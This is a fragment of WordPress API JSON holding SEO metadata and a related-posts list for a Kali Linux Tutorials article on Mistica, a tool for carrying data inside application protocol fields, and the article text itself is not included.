Swiss Army Knife For Arbitrary Communication\" \/>\n<meta property=\"og:description\" content=\"Mistica is a tool that allows to embed data into application layer protocol fields, with the goal of establishing a bi-directional channel for arbitrary\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/mistica\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2020-08-11T02:21:03+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/mistica\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/mistica\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"Mistica : Swiss Army Knife For Arbitrary Communication Over Application Protocols\",\"datePublished\":\"2020-08-11T02:21:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/mistica\/\"},\"wordCount\":2107,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/mistica\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png\",\"keywords\":[\"Mistica\",\"Swiss Army\",\"Swiss Army Knife\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/mistica\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/mistica\/\",\"name\":\"Mistica : Swiss Army Knife For Arbitrary Communication\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/mistica\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/mistica\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png\",\"datePublished\":\"2020-08-11T02:21:03+00:00\",\"description\":\"Mistica is a tool that allows to embed data into application layer protocol fields, with the goal of establishing a bi-directional channel for arbitrary\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/mistica\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/mistica\/#primaryimage\",\"url\":\"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png\",\"contentUrl\":\"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Mistica : Swiss Army Knife For Arbitrary Communication","description":"Mistica is a tool that allows to embed data into application layer protocol fields, with the goal of establishing a bi-directional channel for arbitrary","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/mistica\/","og_locale":"en_US","og_type":"article","og_title":"Mistica : Swiss Army Knife For Arbitrary Communication","og_description":"Mistica is a tool that allows to embed data into application layer protocol fields, with the goal of establishing a bi-directional channel for arbitrary","og_url":"https:\/\/kalilinuxtutorials.com\/mistica\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2020-08-11T02:21:03+00:00","og_image":[{"url":"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"15 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/mistica\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/mistica\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"Mistica : Swiss Army Knife For Arbitrary Communication Over Application Protocols","datePublished":"2020-08-11T02:21:03+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/mistica\/"},"wordCount":2107,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/mistica\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png","keywords":["Mistica","Swiss Army","Swiss Army Knife"],"articleSection":["Kali Linux"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/mistica\/","url":"https:\/\/kalilinuxtutorials.com\/mistica\/","name":"Mistica : Swiss Army Knife For Arbitrary Communication","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/mistica\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/mistica\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png","datePublished":"2020-08-11T02:21:03+00:00","description":"Mistica is a tool that allows to embed data into application layer protocol fields, with the goal of establishing a bi-directional channel for arbitrary","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/mistica\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/mistica\/#primaryimage","url":"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png","contentUrl":"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":38664,"url":"https:\/\/kalilinuxtutorials.com\/how-udp-works-and-why-it-is-so-fast\/","url_meta":{"origin":11189,"position":0},"title":"How UDP Works and Why It Is So Fast","author":"0xSnow","date":"March 23, 2026","format":false,"excerpt":"When people ask how UDP works, the simplest answer is this: UDP sends data quickly from one application to another without creating a formal connection first. That design makes it lightweight and fast, but it also means the protocol does not guarantee delivery, ordering, or retransmission. UDP stands for User\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"How UDP Works and Why It Is So Fast","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi4Bq0tporiYS_nji5QYzp5TMFt7L7ZJ1RHkqrJd2GLYzEX96upOpauXPCZbg2WqXs4QWegGCjkyPefpCXzTWCKuInn_Xo6EkglCh6_1DgmdMXiHWpK7oHmNCxPJHeXfECeUlBeGBXwK5-WIlgRrBsoziFAFKwL4LDUZNKsrnJ6cfTr2tBYapwRYAJg3KM\/s700\/How%20UDP%20Works%20and%20Why%20It%20Is%20So%20Fast%20%281%29.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi4Bq0tporiYS_nji5QYzp5TMFt7L7ZJ1RHkqrJd2GLYzEX96upOpauXPCZbg2WqXs4QWegGCjkyPefpCXzTWCKuInn_Xo6EkglCh6_1DgmdMXiHWpK7oHmNCxPJHeXfECeUlBeGBXwK5-WIlgRrBsoziFAFKwL4LDUZNKsrnJ6cfTr2tBYapwRYAJg3KM\/s700\/How%20UDP%20Works%20and%20Why%20It%20Is%20So%20Fast%20%281%29.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi4Bq0tporiYS_nji5QYzp5TMFt7L7ZJ1RHkqrJd2GLYzEX96upOpauXPCZbg2WqXs4QWegGCjkyPefpCXzTWCKuInn_Xo6EkglCh6_1DgmdMXiHWpK7oHmNCxPJHeXfECeUlBeGBXwK5-WIlgRrBsoziFAFKwL4LDUZNKsrnJ6cfTr2tBYapwRYAJg3KM\/s700\/How%20UDP%20Works%20and%20Why%20It%20Is%20So%20Fast%20%281%29.jpg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi4Bq0tporiYS_nji5QYzp5TMFt7L7ZJ1RHkqrJd2GLYzEX96upOpauXPCZbg2WqXs4QWegGCjkyPefpCXzTWCKuInn_Xo6EkglCh6_1DgmdMXiHWpK7oHmNCxPJHeXfECeUlBeGBXwK5-WIlgRrBsoziFAFKwL4LDUZNKsrnJ6cfTr2tBYapwRYAJg3KM\/s700\/How%20UDP%20Works%20and%20Why%20It%20Is%20So%20Fast%20%281%29.jpg?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":36312,"url":"https:\/\/kalilinuxtutorials.com\/rust-libp2p\/","url_meta":{"origin":11189,"position":1},"title":"rust-libp2p : The Backbone Of Peer-to-Peer Networking In Rust","author":"Varshini","date":"February 11, 2025","format":false,"excerpt":"The rust-libp2p repository is the central hub for developing the Rust implementation of the libp2p networking stack, a modular and extensible framework for building peer-to-peer (P2P) applications. It is widely used in distributed systems such as Ethereum, IPFS, and Filecoin. Below is an overview of its functionality and structure. Core\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/rust-libp2p-.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/rust-libp2p-.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/rust-libp2p-.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/rust-libp2p-.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/rust-libp2p-.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/rust-libp2p-.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":35068,"url":"https:\/\/kalilinuxtutorials.com\/wireshark-network-traffic-analysis\/","url_meta":{"origin":11189,"position":2},"title":"Getting Started with Wireshark: Network Traffic Analysis","author":"Rajashekar Yasani","date":"May 6, 2016","format":false,"excerpt":"Wireshark is a powerful and widely-used network protocol analyzer that allows users to capture and interactively browse the traffic running on a computer network. This guide will walk you through the basics of how Wireshark works, how to analyze network traffic, its features, and technical specifications. How Wireshark Works Wireshark\u2026","rel":"","context":"In &quot;Web Application Security&quot;","block_context":{"text":"Web Application Security","link":"https:\/\/kalilinuxtutorials.com\/category\/web-application-security\/"},"img":{"alt_text":"Wireshark","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiHtZ8KQ1NFJ9rxpOlfXHHSm9hdpSuDRbIWQHH_EdW7PlteTd4YOmH4IPRedruA0vhc-ESu4mtc-Y4by3Z3utczWmRNRuHc3Xo76eRabN_U4lLX1ICcliy-gbLlG0mEAKR2OGEj4DX24IwdhNU9jBePIdzQIKlovQqA6C0lo0SPUOYPtMYFvdb0tyFyA-zL\/s16000\/Wireshark.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiHtZ8KQ1NFJ9rxpOlfXHHSm9hdpSuDRbIWQHH_EdW7PlteTd4YOmH4IPRedruA0vhc-ESu4mtc-Y4by3Z3utczWmRNRuHc3Xo76eRabN_U4lLX1ICcliy-gbLlG0mEAKR2OGEj4DX24IwdhNU9jBePIdzQIKlovQqA6C0lo0SPUOYPtMYFvdb0tyFyA-zL\/s16000\/Wireshark.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiHtZ8KQ1NFJ9rxpOlfXHHSm9hdpSuDRbIWQHH_EdW7PlteTd4YOmH4IPRedruA0vhc-ESu4mtc-Y4by3Z3utczWmRNRuHc3Xo76eRabN_U4lLX1ICcliy-gbLlG0mEAKR2OGEj4DX24IwdhNU9jBePIdzQIKlovQqA6C0lo0SPUOYPtMYFvdb0tyFyA-zL\/s16000\/Wireshark.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiHtZ8KQ1NFJ9rxpOlfXHHSm9hdpSuDRbIWQHH_EdW7PlteTd4YOmH4IPRedruA0vhc-ESu4mtc-Y4by3Z3utczWmRNRuHc3Xo76eRabN_U4lLX1ICcliy-gbLlG0mEAKR2OGEj4DX24IwdhNU9jBePIdzQIKlovQqA6C0lo0SPUOYPtMYFvdb0tyFyA-zL\/s16000\/Wireshark.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiHtZ8KQ1NFJ9rxpOlfXHHSm9hdpSuDRbIWQHH_EdW7PlteTd4YOmH4IPRedruA0vhc-ESu4mtc-Y4by3Z3utczWmRNRuHc3Xo76eRabN_U4lLX1ICcliy-gbLlG0mEAKR2OGEj4DX24IwdhNU9jBePIdzQIKlovQqA6C0lo0SPUOYPtMYFvdb0tyFyA-zL\/s16000\/Wireshark.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiHtZ8KQ1NFJ9rxpOlfXHHSm9hdpSuDRbIWQHH_EdW7PlteTd4YOmH4IPRedruA0vhc-ESu4mtc-Y4by3Z3utczWmRNRuHc3Xo76eRabN_U4lLX1ICcliy-gbLlG0mEAKR2OGEj4DX24IwdhNU9jBePIdzQIKlovQqA6C0lo0SPUOYPtMYFvdb0tyFyA-zL\/s16000\/Wireshark.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":15506,"url":"https:\/\/kalilinuxtutorials.com\/yersinia\/","url_meta":{"origin":11189,"position":3},"title":"Yersinia for Layer 2 &#8211; Vulnerability Analysis &#038; DHCP Starvation Attack","author":"Ravi Sankar","date":"June 26, 2018","format":false,"excerpt":"Yersinia is a network tool designed to take advantage of some weakness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. It consists of various layer-2 attacks exploiting the weaknesses of different layer-2 protocols. Thus a pentester can identify\u2026","rel":"","context":"In &quot;Vulnerability Analysis&quot;","block_context":{"text":"Vulnerability Analysis","link":"https:\/\/kalilinuxtutorials.com\/category\/vulnerability-analysis-tools\/"},"img":{"alt_text":"dhcp starvation","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/05\/yersinia1.png?resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/05\/yersinia1.png?resize=350%2C200 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/05\/yersinia1.png?resize=525%2C300 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/05\/yersinia1.png?resize=700%2C400 2x"},"classes":[]},{"id":4079,"url":"https:\/\/kalilinuxtutorials.com\/ntopng-traffic-monitoring\/","url_meta":{"origin":11189,"position":4},"title":"Ntopng : Web-based Traffic &#038; Security Network Traffic Monitoring","author":"R K","date":"March 6, 2019","format":false,"excerpt":"Ntopng is a web-based network traffic monitoring application released under GPLv3. It is the new incarnation of the original ntop written in 1998, and now revamped in terms of performance, usability, and features. If instead of source code you prefer to use a pre-built package, please go to http:\/\/packages.ntop.org We\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":31149,"url":"https:\/\/kalilinuxtutorials.com\/trafficwatch\/","url_meta":{"origin":11189,"position":5},"title":"TrafficWatch &#8211; A Comprehensive Guide To Network Traffic Analysis With Packet Sniffing","author":"Varshini","date":"November 3, 2023","format":false,"excerpt":"TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more. Features Protocol-specific packet analysis for ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, and NetBIOS. Packet\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj7V8t_QpogGHkYHB7iCMgeHC-OigVt18GoU994S_s0TrCmBLgCQmDiWBV2IIgVvMrdEvHtaSxkHIgqEZ8JLBE4RgelQuoE7jWwAKNuFGrPUOl2_iBitV3JBQrvYHnQ9y4SQb-x8-vFt7MSnqvk19JhPp05AhC_6dJ0mFMjPHfmkle8VBLbF90uwB_-Cg\/s16000\/TrafficWatch%20.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj7V8t_QpogGHkYHB7iCMgeHC-OigVt18GoU994S_s0TrCmBLgCQmDiWBV2IIgVvMrdEvHtaSxkHIgqEZ8JLBE4RgelQuoE7jWwAKNuFGrPUOl2_iBitV3JBQrvYHnQ9y4SQb-x8-vFt7MSnqvk19JhPp05AhC_6dJ0mFMjPHfmkle8VBLbF90uwB_-Cg\/s16000\/TrafficWatch%20.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj7V8t_QpogGHkYHB7iCMgeHC-OigVt18GoU994S_s0TrCmBLgCQmDiWBV2IIgVvMrdEvHtaSxkHIgqEZ8JLBE4RgelQuoE7jWwAKNuFGrPUOl2_iBitV3JBQrvYHnQ9y4SQb-x8-vFt7MSnqvk19JhPp05AhC_6dJ0mFMjPHfmkle8VBLbF90uwB_-Cg\/s16000\/TrafficWatch%20.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj7V8t_QpogGHkYHB7iCMgeHC-OigVt18GoU994S_s0TrCmBLgCQmDiWBV2IIgVvMrdEvHtaSxkHIgqEZ8JLBE4RgelQuoE7jWwAKNuFGrPUOl2_iBitV3JBQrvYHnQ9y4SQb-x8-vFt7MSnqvk19JhPp05AhC_6dJ0mFMjPHfmkle8VBLbF90uwB_-Cg\/s16000\/TrafficWatch%20.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj7V8t_QpogGHkYHB7iCMgeHC-OigVt18GoU994S_s0TrCmBLgCQmDiWBV2IIgVvMrdEvHtaSxkHIgqEZ8JLBE4RgelQuoE7jWwAKNuFGrPUOl2_iBitV3JBQrvYHnQ9y4SQb-x8-vFt7MSnqvk19JhPp05AhC_6dJ0mFMjPHfmkle8VBLbF90uwB_-Cg\/s16000\/TrafficWatch%20.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj7V8t_QpogGHkYHB7iCMgeHC-OigVt18GoU994S_s0TrCmBLgCQmDiWBV2IIgVvMrdEvHtaSxkHIgqEZ8JLBE4RgelQuoE7jWwAKNuFGrPUOl2_iBitV3JBQrvYHnQ9y4SQb-x8-vFt7MSnqvk19JhPp05AhC_6dJ0mFMjPHfmkle8VBLbF90uwB_-Cg\/s16000\/TrafficWatch%20.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/11189","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=11189"}],"version-history":[{"count":0,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/11189\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/16458"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=11189"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=11189"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=11189"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}